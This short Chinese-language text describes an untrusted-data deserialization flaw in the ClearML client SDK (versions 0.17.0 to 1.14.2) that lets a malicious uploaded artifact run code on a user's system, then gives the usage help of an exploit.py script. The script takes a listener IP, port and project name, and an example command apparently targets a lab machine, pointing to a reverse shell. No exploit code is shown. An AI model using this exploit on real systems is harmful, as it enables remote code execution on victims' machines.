在 Allegro AI 的 ClearML 平台客户端 SDK 的 0.17.0 至 1.14.2 版本中,存在未受信任数据反序列化问题,导致恶意上传的工件与用户交互时可在终端用户系统上执行任意代码。
usage: exploit.py [-h] -i IP -p PORT -P PROJECT
options:
-h, --help 显示此帮助信息并退出
-i IP 监听器的 IP 地址
-p PORT 监听器的端口号
-P PROJECT 现有项目的名称
example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'